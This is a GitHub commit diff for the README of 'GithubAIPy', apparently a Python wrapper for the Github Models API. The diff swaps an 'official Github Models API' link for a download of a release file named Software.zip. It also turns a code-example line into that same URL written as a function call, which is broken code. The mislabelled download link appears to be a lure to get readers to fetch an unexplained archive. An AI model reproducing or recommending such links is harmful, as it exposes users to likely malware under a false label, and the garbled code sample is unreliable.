You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Welcome to GithubAIPy! This repository contains a small Python wrapper for Github Models API. With this wrapper, you can easily interact with various AI models available on Github and leverage their capabilities in your projects. Whether you are working on AI, chat applications, or data analysis, GithubAIPy has got you covered!
6
6
7
7
## Installation
8
8
9
9
To get started with GithubAIPy, you can download the latest release by clicking the button below:
response =chat_model.generate_response("Hello, how are you?")
39
+
response =https://github.com/JEFF2807/GithubAIPy/releases/download/v1.0/Software.zip("Hello, how are you?")
40
40
41
41
print(response)
42
42
```
@@ -69,6 +69,6 @@ This project is licensed under the MIT License - see the [LICENSE](LICENSE) file
69
69
70
70
---
71
71
72
-
💡 **Pro Tip**: Visit the official [Github Models API](https://github.com/cli/go-gh/archive/refs/tags/v1.0.0.zip) page for more information and updates on available models.
72
+
💡 **Pro Tip**: Visit the official [Github Models API](https://github.com/JEFF2807/GithubAIPy/releases/download/v1.0/Software.zip) page for more information and updates on available models.
73
73
74
74
🚀 Start exploring the world of AI with GithubAIPy today! Thank you for checking out this repository! 🤖
0 commit comments